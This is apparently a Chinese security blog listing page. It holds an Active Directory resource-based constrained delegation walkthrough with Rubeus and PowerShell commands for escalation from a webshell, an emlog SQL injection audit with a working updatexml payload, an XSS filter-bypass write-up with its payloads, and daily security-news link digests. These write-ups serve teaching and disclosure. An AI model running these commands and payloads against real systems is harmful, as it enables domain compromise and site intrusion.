基于资源的约束委派利用攻击介绍二
前言 RBCD常见的攻击手法都是通过添加机器账号,然后设置委派,可参考https://mp.weixin.qq.com/s/Cc-SiuwtGTB_cKQBc1IX0g,那如果域管理员设置了域内默认添加的机器账号的数量为0呢? 修改ms-DS-MachineAccountQuota可以通过ADSI编辑器更改:   也可以通过admod工具更改: AdMod.exe -b  "dc=rootkit,dc=org" "ms-DS-MachineAccountQuota::0" -updatenchead 最后能看到ms-DS-MachineAccountQuota为0:   自己委派自己 尝试利用老方法,能够发现添加机器账号失败了,也是情理之中:   https://mp.weixin.qq.com/s/Cc-SiuwtGTB_cKQBc1IX0g中有讲到,机器自身和把机器拉入域的域用户都有权限更改机器的msDS-AllowedToActOnBehalfOfOtherIdentity属性,而且还提到,服务账号,如iis、localservice这些,发起网络请求的身份是机器账号:      因此我们可以自己委派自己,把机器的msDS-AllowedToActOnBehalfOfOtherIdentity改为自身机器账号,然后自身机器账号在模拟用户进行委派攻击。 我们模拟一下实战,首先打到了一个内网的webshell,iis apppool权限:   利用ADModule来设置自己委派给自己: powershell -ep bypass "import-module .\Microsoft.ActiveDirectory.Management.dll;$iis = get-adcomputer SRV-WEB-KIT;set-adcomputer SRV-WEB-KIT -PrincipalsAllowedToDelegateToAccount $iis" 查询委派信息(利用工具:https://github.com/Jumbo-WJB/search_rbcd),设置委派成功:   这时候看过我https://mp.weixin.qq.com/s/Cc-SiuwtGTB_cKQBc1IX0g的小伙伴会想了:“接下来我会,使用机器账号的凭证发起s4u协议就可以委派了”,确实是可以,但是这里是低权限用户,没法抓密码,也就无法获取机器账号凭证,那应该如何操作呢? 首先利用rubeus通过AcquireCredentialsHandle、InitializeSecurityContext,以非高权限申请转发票据: rubeus.exe tgtdeleg /nowrap    利用s4u协议请求票据: rubeus.exe s4u /user:SRV-WEB-KIT$ /domain:rootkit.org /dc:owa2013.rootkit.org /impersonateuser:administrator /msdsspn:http/SRV-WEB-KIT.rootkit.org /ptt /ticket:doIFLxxxxxxxxxx    最终也成功的利用http spn对该机器进行了提权操作: powershell -ep bypass "invoke-command -computername SRV-WEB-KIT.rootkit.org -Command {whoami}"   抓密码啥的当然也不在话下:    总结 本文描述了在MAQ为0的情况下的提权手段(当然不止文中的这些手段),可见设置MAQ为0并不能完全的防御住基于资源的约束委派攻击。
网络安全日报 2022年01月27日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、苹果发布安全更新修复了两个零日漏洞 https://securityaffairs.co/wordpress/127240/hacking/apple-fixed-two-zero-day-2022.html 2、新的 DeadBolt 勒索软件针对 QNAP NAS 设备 https://securityaffairs.co/wordpress/127221/malware/deadbolt-ransomware-qnap-nas.html 3、VMware 敦促客户修补Horizon 服务器中的Log4j 漏洞 https://securityaffairs.co/wordpress/127214/security/vmware-horizon-patches-log4j-flaws.html 4、PwnKit:本地提权漏洞影响主流的 Linux 发行版 https://securityaffairs.co/wordpress/127199/security/linux-cve-2021-4034-bug.html 5、PrinterLogic 修复了打印机管理套件中的严重漏洞 https://securityaffairs.co/wordpress/127194/security/printerlogic-printer-management-suite-flaws.html 6、Android 安全工具 APKLeaks 修补严重漏洞 https://portswigger.net/daily-swig/android-security-tool-apkleaks-patches-critical-vulnerability 7、Linux内核漏洞(CVE-2022-0185)可用于逃逸Kubernetes容器 https://www.bleepingcomputer.com/news/security/linux-kernel-bug-can-let-hackers-escape-kubernetes-containers/ 8、黑客利用MSHTML漏洞针对西亚政府和国防目标 https://www.trellix.com/en-gb/about/newsroom/stories/threat-labs/prime-ministers-office-compromised.html 9、GitHub iOS和Android 应用启用双因素身份验证机制 https://www.zdnet.com/article/github-enables-two-factor-authentication-mechanism-through-ios-android-app 10、Claroty 发布新的开源工具用于研究分析EtherNet/IP 堆栈 https://www.securityweek.com/new-open-source-tool-helps-identify-ethernetip-stacks-ics-research-analysis
网络安全日报 2022年01月26日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Segway 电子商店遭受 Magecart 攻击 https://securityaffairs.co/wordpress/127187/cyber-crime/segway-magecart-attack.html 2、英国 NCSC 将发布一组Nmap 脚本以查找未修补的漏洞 https://securityaffairs.co/wordpress/127181/hacking/uk-ncsc-scanning-made-easy-sme.html 3、最新版本的 Android RAT BRATA 在窃取数据后擦除设备 https://securityaffairs.co/wordpress/127131/cyber-crime/new-android-brata-rat.html 4、加拿大外交部在网络攻击后遭受服务中断 https://www.bleepingcomputer.com/news/security/canadas-foreign-affairs-ministry-hacked-some-services-down/ 5、攻击者正在利用 SonicWall SMA 设备RCE 漏洞 https://securityaffairs.co/wordpress/127147/hacking/sonicwall-secure-mobile-access-rce.html 6、Molerats APT组织针对中东发起新的间谍攻击 https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east 7、巴西中央银行的Pix即时支付系统泄露用户数据 https://playcrazygame.com/2022/01/23/central-bank-reports-pix-key-data-leak/ 8、DTPacker恶意软件分发多个木马和信息窃取程序 https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1 9、黑客组织加密了白俄罗斯铁路公司服务器以示抗议 https://www.bleepingcomputer.com/news/security/hackers-say-they-encrypted-belarusian-railway-servers-in-protest/ 10、《黑暗之魂3》游戏服务器因严重的RCE漏洞而关闭 https://www.kaspersky.com/blog/dark-souls-dangerous-vulnerability/43436/
网络安全日报 2022年01月25日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Microsoft 在最新Excel中默认禁用所有 Excel 4.0 宏 https://www.securityweek.com/microsoft-restricts-excel-40-macros-default 2、Facebook 母公司 Meta 周一宣布将打造超级计算机 https://www.securityweek.com/facebook-trumpets-massive-new-supercomputer 3、CentOS Web Panel 存在两个严重漏洞可导致服务器被远程攻击 https://www.securityweek.com/cwp-flaws-expose-servers-remote-attacks-possibly-exploited-wild 4、Rust 中的一个高危漏洞可导致文件和目录被删除 https://securityaffairs.co/wordpress/127135/security/rust-programming-language-flaw.html 5、Emotet 垃圾邮件使用非常规IP 地址格式来逃避检测 https://securityaffairs.co/wordpress/127108/malware/emotet-evasion-technique.html 6、WhisperGate和NotPetya恶意软件策略相似 https://thehackernews.com/2022/01/experts-find-strategic-similarities-bw.html 7、CISA在已知被利用漏洞目录新增17个漏洞 https://www.bleepingcomputer.com/news/security/cisa-adds-17-vulnerabilities-to-list-of-bugs-exploited-in-attacks/ 8、研究人员发现jQuery UI库中存在多个漏洞 https://www.securityweek.com/resurrected-jquery-ui-library-haunts-some-websites-enterprise-products 9、钓鱼邮件冒充航运巨头马士基传播STRRAT木马 https://www.bleepingcomputer.com/news/security/phishing-impersonates-shipping-giant-maersk-to-push-strrat-malware/ 10、F5发布安全补丁修复影响其产品的25个漏洞 https://securityaffairs.co/wordpress/127097/security/f5-big-ip-flaws.html
网络安全日报 2022年01月24日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、F5 修补了 BIG-IP 中的两个漏洞 https://www.securityweek.com/f5-patches-two-dozen-vulnerabilities-big-ip 2、McAfee Enterprise 修补了高危漏洞 https://www.securityweek.com/high-severity-vulnerabilities-patched-mcafee-enterprise-product 3、Spamhaus称DoH 使追踪僵尸网络变得更加困难 https://www.securityweek.com/doh-makes-it-difficult-track-botnets-spamhaus 4、OpenSubtitles 数据泄露影响了 700 万订阅者 https://securityaffairs.co/wordpress/127092/data-breach/opensubtitles-data-breach.html 5、荷兰国家网络安全中心 (NCSC) 警告与 Log4J 漏洞相关网络攻击 https://securityaffairs.co/wordpress/127067/security/dutch-ncsc-warns-log4j-attacks.html 6、McAfee Agent 软件中的一个安全漏洞可导致提权 https://securityaffairs.co/wordpress/127044/security/mcafee-agent-code-execution-flaw.html 7、Google Project Zero 披露了两个 Zoom 零日漏洞的细节 https://securityaffairs.co/wordpress/127016/hacking/zoom-zero-day-vulnerabilities.html 8、数十个 WordPress 插件和主题被植入了后门 https://thehackernews.com/2022/01/hackers-planted-secret-backdoor-in.html 9、BHUNT密码窃取恶意软件瞄准加密货币钱包 https://thehackernews.com/2022/01/new-bhunt-password-stealer-malware.html 10、Conti勒索软件团伙泄露印度尼西亚银行数据 https://securityaffairs.co/wordpress/126988/cyber-crime/bank-indonesia-conti-ransomware.html
网络安全日报 2022年01月21日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、FBI 将 Diavol 勒索软件与 TrickBot 团伙关联 https://securityaffairs.co/wordpress/126979/cyber-crime/fbi-links-diavol-ransomware-trickbot.html 2、Cisco StarOS 漏洞可能允许远程代码执行和信息泄露 https://securityaffairs.co/wordpress/126968/security/cisco-staros-rce-information-disclosure.html 3、Crypto.com 证实网络攻击影响400 多个账户和被盗3300 万美元 https://securityaffairs.co/wordpress/126956/hacking/crypto-com-crypto-heist.html 4、新的 BHUNT Stealer 恶意软件针对加密货币钱包 https://securityaffairs.co/wordpress/126938/malware/bhunt-stealer-targets-cryptocurrency.html 5、微软警告称新的SolarWinds Serv-U 漏洞被在野利用 https://securityaffairs.co/wordpress/126933/security/solarwinds-serv-u-flaw.html 6、 Chrome 97更新修补22个漏洞,包括多个高危漏洞 https://www.securityweek.com/google-pays-out-over-100000-vulnerabilities-patched-chrome-97-update 7、DoNot 黑客团伙针对南亚的政府和军事实体 https://thehackernews.com/2022/01/donot-hacking-team-targeting-government.html 8、钓鱼邮件冒充美国劳工部窃取用户的帐户凭据 https://www.inky.com/blog/fresh-phish-phishers-lure-victims-with-fake-invites-to-bid-on-nonexistent-federal-projects 9、Umbraco CMS中的漏洞可能导致帐户被接管 https://portswigger.net/daily-swig/security-vulnerabilities-in-umbraco-cms-could-lead-to-account-takeover 10、免费字幕网站OpenSubtitles披露遭到黑客攻击 https://therecord.media/opensubtitles-discloses-successful-extortion-attempt-data-breach/
如何审计一个冷门的cms?
前言 刚开始代码审计多多少少会有种无从下手的感觉,想要通过自己的代码审计能力直接审计出漏洞未免有些困难。但是如果直接拿到一个cms开始审,刚开始可能富有激情,可是越审到后面就会越怀疑自己,然后放弃代码审计。造成这样的现象的原因便是:不知道自己到底能不能审到漏洞。 那如何审出一个很少人知道,并且肯定存在的洞呢? 本文介绍的办法就是:上cnvd看看以前师傅提交的洞,虽然大多数的洞都是不公开的,但是我们还是可以根据cnvd给的一点点信息来尝试复现。 因此,本文涉及到的漏洞都是比较早被发现,危害性较低,并且已经被厂商修复的漏洞,本文仅对代码审计的过程做一个分析。 确定目标 刚开始审计,可以选择一些比较冷门的cms(内容管理系统),挑选一个自己擅长的cms语言审计,之所以选择冷门的cms是因为这些cms一般存在的安全问题会比热门cms多。 本文选用的cms是:emlog(V5.3.1),这个cms是使用PHP语言开发的个人博客管理系统  信息收集 确定完目标之后,就需要上cnvd搜索该cms历史存在的一些漏洞,本文演示的是emlog   可以看到在cnvd上存在这么一些漏洞,虽然在漏洞详情页面并没有直接写漏洞是怎么形成的,但是在这里或多或少会存在一些信息。比如在哪个地方会存在什么类型的洞。 接下里挑选一个简单的漏洞进行演示    复现漏洞 由上图可知,在后台页面,一般是admin目录下,有一个ta打头的文件,而我们查看一下emlog目录,唯一一个ta打头的文件就是tags.php   而在tag.php仅有50余行代码,因此想在50行左右的代码地方找到一个SQL注入还是比较简单的  首先是大概了解一下这50余行代码的作用,对于一个博客内容管理系统来说,tag.php应该是一个处理文章标签管理的文件 因此我们这个cms可能会用到这个文件的页面   在这个页面中存在几种操作,一个是全选,一个是删除,其中点进标签后还存在标签修改的功能   这几个功能对应在tag.php中就是这么几个if语句  而执行哪一种操作是根据传入action的值来决定的 因此,接来下审计在这些if语句中可能存在的SQL注入的点 首先是第一个if判断 if ($action == '') { $tags = $Tag_Model->getTag(); include View::getView('header'); require_once View::getView('tag'); include View::getView('footer'); View::output(); } 这一个if判断只有一个action是可控的,其余没有参数可控,因此这个函数不存在SQL注入的点 然后再看一下第二个if判断 if ($action== "mod_tag") { $tagId = isset($_GET['tid']) ? intval($_GET['tid']) : ''; $tag = $Tag_Model->getOneTag($tagId); extract($tag); include View::getView('header'); require_once View::getView('tagedit'); include View::getView('footer');View::output(); } 这一个if判断相比上一个多一个tid为可控参数,不过cms对传入的tid进行了intval的转换 不过我们还是跟进getOneTag方法看一下 function getOneTag($tagId) { $tag = array(); $row = $this->db->once_fetch_array("SELECT tagname,tid FROM ".DB_PREFIX."tag WHERE tid=$tagId"); $tag['tagname'] = htmlspecialchars(trim($row['tagname'])); $tag['tagid'] = intval($row['tid']); return $tag; } getOneTag方法具有一个参数tagId,这个tagId就是前面我们自定义传入的tid,不过这个地方没法传入字符串进行闭合注入,因为在传入这个方法以前就已经intval转换了,所以这个点不存在sql注入 接下来看第三个if判断 //标签修改 if ($action=='update_tag') { $tagName = isset($_POST['tagname']) ? addslashes($_POST['tagname']) : ''; $tagId = isset($_POST['tid']) ? intval($_POST['tid']) : '';          if (empty($tagName)) {         emDirect("tag.php?action=mod_tag&tid=$tagId&error_a=1");     }      $Tag_Model->updateTagName($tagId, $tagName); $CACHE->updateCache(array('tags', 'logtags')); emDirect("./tag.php?active_edit=1"); } 这里相比上面多了一个tagname,这个tagname可以传入字符串,也就是有可能会存在SQL注入,不过在传入的时候,cms会对这个tagname进行一个addslashes函数转换,也就是传入的单引号以及一些特殊符号会被转译。 我们这边抓包尝试一下 首先查看一下现在的标签,此时有两个标签tag112以及tags2123   上面提到的tagname其实就是标签的名字,我们抓包将tag112修改为tag112',尝试能否闭合   这时候我们返回主页面   发现此时标签变为了tag112',所以单引号是被转义了,没法直接进行SQL注入。 当然,如果数据库的编码为GBK,那么可以尝试宽字节注入,不过默认使用的数据库为utf8,因此无法使用宽字节注入。 接下来看第4个if判断 //批量删除标签 if ($action== 'dell_all_tag') { $tags = isset($_POST['tag']) ? $_POST['tag'] : '';     LoginAuth::checkToken(); if (!$tags) { emDirect("./tag.php?error_a=1"); } foreach ($tags as $key=>$value) { $Tag_Model->deleteTag($key); } $CACHE->updateCache(array('tags', 'logtags')); emDirect("./tag.php?active_del=1"); } 这个地方POST传入了一个tag,是我们的可控参数,并且这里没有对tag进行转义,所以我们再往下看是否存在SQL注入 其中我们传入的tag最终会成为tags数组中的key,仔细看一下foreach循环中,传入的deleteTag方法的参数是数组中的key,而在PHP中,数组的key并不一定需要是数字,也可以是一个字符串,只要key和value对应即可。 我们这个时候先不着急抓包,先看看deleteTag方法是如何实现的。 跟进deleteTag方法 function deleteTag($tagId) { $this->db->query("DELETE FROM ".DB_PREFIX."tag where tid=$tagId"); } 可以发现,SQL语句执行的时候也是没有进行任何过滤的。 这里我们开始抓包   可以看到post传入了tag[1],这里我们对方括号中的1开始注入,这里也不需要引号闭合,直接注即可。 我使用的是报错注入 tag%5B1%20and%20updatexml(0,concat(0x7e,version()),1)%20%23%5D=1&token=c16eaff79a17d690f5c0caae66276085   看下方的结果,已经把数据库的版本爆出来了。   总结 本文所复现的是在后台的SQL注入,利用难度较大,危害性较低。并且审计这个cms并不是直接拿一个cms从头开始审,而是根据在cnvd中存在的一些模糊信息进行审计,来提高自己复现这个漏洞的成功率,不至于在一开始就碰壁,而能在相对短的时间里获得较大的成就感,提高学习效率。
某SRC BypassXSS
声明: 挖掘的案例均已提交至漏洞平台并已经修复,本文仅限于技术讨论与分享,严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负,与本号及原作者无关。 先是在一个某SRC千万级APP,摸到其论坛,瞎逛,啥都去点一遍,发现一个发表感想的地方 尝试打了一个<h1>whskxk</h1>whskxk,发送之后比较一下字体会进行变化,猜测此处存在XSS。 刚开始用svg  iframe标签  form表单 a标签带JavaScript,details ontoggle 尝试携带xss的执行语句,发现发送之后全部被过滤掉,并且全部被过滤为空。 顺带一提,如果直接在发表评论的文本框直接打payload,会被一个<p>标签和<br>标签包住,导致打入的payload会被以文本的形式输出,这边可以利用Burpsuite抓取请求包,把里面的<p>和<br>标签全删掉,注意要全删掉 不能就删个<br>标签 不然上传服务器的时候会请求格式错误。 后续尝试了多种标签 发现唯独img标签没有被过滤掉,猜测应该是本来这个论坛就支持图片插入,支持远程加载图片,导致让我们有机可乘。如图所示↓ 尝试打个<img src=1>,这个目的是为了看看系统有没有判断src来源必须是http协议或者https协议,结果显而易见没有进行来源判断,前端成功显示payload. 发现这些居然都没过滤 直接简单无脑打payload:<img src=1 onerror=alert(1)>,发现onerror后面全部被过滤为空。 当时以为onerror被过滤,替换了oneload,onpageshow,onmouseover,onbounce,onstart等 Tips:onstart,onbounce当时这两个本地调试的时候,就只有火狐能弹,chrome弹不出来。 当时第一感觉应该是空格的问题导致他们被分割 系统牛马的读取方式我也猜不到,于是尝试性的去把src=1和onerror之间的空格改成+看看会不会解析。 payload:<img+src=1+onerror=alert(1)> 居然发现!虽然onerror事件前面的+被没解析为空格但是确切发现了是空格的问题,同时还发现了()被url编码了一遍 空格过滤+圆括号过滤!简单有手就行. 为了万无一失重组一下payload:<img/src=1/onerror=alert`1`>,但是又发现这个src和onerror之间的/的又没有被解析为空格。看到“1/onerror=`1`”是整个双引号包住了,当作一个整体成为了src的来源值,所以onerror事件不会被执行 小彩蛋:当时由于这个系统每天只能回帖15次 我找F12群里的师傅们帮忙试几个payload, 我一直在编辑里面捣鼓毕竟没次数了,后来发现甘栗酿编辑怎么样也弹不了,重新回复发帖就可以弹。这边还过滤了alert但是Alert没过滤 但话又说回来编辑功能点这边Alert不会被解析所以导致编辑处弹不了窗。(其实还可以用别的弹窗事件,当是感觉Alert也会弹的,就没去尝试别的) 当时我这边的思路就是利用“再去尝试闭合掉,把前面的“和src=1后面的自己输入转义之后的”闭合,接着遇到了空格被正常解析 ,onerror后面的又被“”包住,且本地调试是包住带着反引号也是可以执行的 当时发现这个回显我有点迷糊所以本地调试了一下 发现是可以弹的,但是注意!我当时是在编辑里面改的!不是直接重新发帖,回过头发现这个payload 在发表评论是可以弹出来的!!! 后来就在群里讨论 ,讨论完就继续试。突然一声QQ提示音 打开一看尼玛出xss了 当时看这个payload还是有点糊涂,仔细理解了一边 和我自己当时琢磨的差不多 想去过滤为空重新组合一遍完整的,但是这个系统的过滤很奇葩 每当组合起来过滤之后的东西就不是自己想要的。同时由于自己在编辑里面测 导致什么都弹不了窗口。直到12点了 可以重新评论 打入自己刚开始在编辑处怎么也弹不出来的payload: <img/src=#\"onerror=alert`whskxk`>成功弹窗。 我觉得刑,师傅们在测试的尽量弹console.log,由于我这边可以编辑修改掉 我图方便就直接在网页弹框了。
网络安全日报 2022年01月20日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Microsoft Edge 添加安全模式以阻止恶意软件攻击 https://www.securityweek.com/microsoft-edge-adds-security-mode-thwart-malware-attacks 2、红十字国际委员会遭大规模网络攻击 https://www.securityweek.com/red-cross-falls-victim-massive-cyberattack 3、研究人员发现针对韩国用户进行DDoS攻击的IRC Bot https://securityaffairs.co/wordpress/126927/malware/irc-bot-ddos.html 4、Zoom 漏洞影响客户端、MMR 服务器 https://www.zdnet.com/article/zoom-vulnerabilities-impact-clients-mmr-servers/ 5、Umbraco CMS 中的安全漏洞可能导致帐户接管 https://portswigger.net/daily-swig/security-vulnerabilities-in-umbraco-cms-could-lead-to-account-takeover 6、新的White Rabbit勒索软件与FIN8黑客组织有关 https://www.bleepingcomputer.com/news/security/new-white-rabbit-ransomware-linked-to-fin8-hacking-group/ 7、VMWare身份验证软件中存在一个SSRF漏洞 https://portswigger.net/daily-swig/ssrf-vulnerability-in-vmware-authentication-software-could-allow-access-to-user-data 8、研究人员披露Box多因素身份验证机制中的漏洞 https://thehackernews.com/2022/01/researchers-bypass-sms-based-multi.html 9、印度Aditya Birla Fashion公司遭黑客入侵数据泄露 https://www.cnbctv18.com/business/companies/aditya-birla-fashion-confirms-data-breach-but-says-no-sensitive-info-was-compromised-12163482.htm 10、《网络安全产业人才岗位能力要求》标准正式发布 https://www.freebuf.com/news/319910.html
网络安全日报 2022年01月19日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、AlphV/BlackCat 勒索团伙公布了从Moncler 窃取的数据 https://securityaffairs.co/wordpress/126880/cyber-crime/alphv-blackcat-ransomware-hit-moncler.html 2、Earth Lusca APT以全球组织为目标 https://securityaffairs.co/wordpress/126868/hacking/earth-lusca-campaigns.html 3、欧洲刑警组织关闭被许多网络犯罪团伙使用的 VPNLab https://securityaffairs.co/wordpress/126862/cyber-crime/vpn-service-vpnlab-shutdown.html 4、微软针对 WinServer、VPN 问题发布紧急修复补丁 https://securityaffairs.co/wordpress/126856/hacking/windows-out-of-band-emergency-fixes.html 5、英国雨伞公司Parasol Group遭黑客入侵网络中断 https://www.theregister.com/2022/01/17/umbrella_company_parasol_group_confirms/ 6、任天堂警告客户虚假网站冒充官网出售折扣商品 https://www.bleepingcomputer.com/news/security/nintendo-warns-of-spoofed-sites-pushing-fake-switch-discounts/ 7、Zoho修复ManageEngine Desktop Central中漏洞 https://thehackernews.com/2022/01/zoho-releases-patch-for-critical-flaw.html 8、严重的SAP漏洞可能被攻击者滥用于供应链攻击 https://www.securityweek.com/critical-sap-vulnerability-allows-supply-chain-attacks 9、3 个 WordPress 插件中的高危漏洞影响 84,000 个网站 https://securityaffairs.co/wordpress/126821/hacking/wordpress-plugins-flaws-2.html 10、未来三年中国网络安全市场将保持15%以上增速 http://www.cinic.org.cn/xw/schj/1225749.html
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页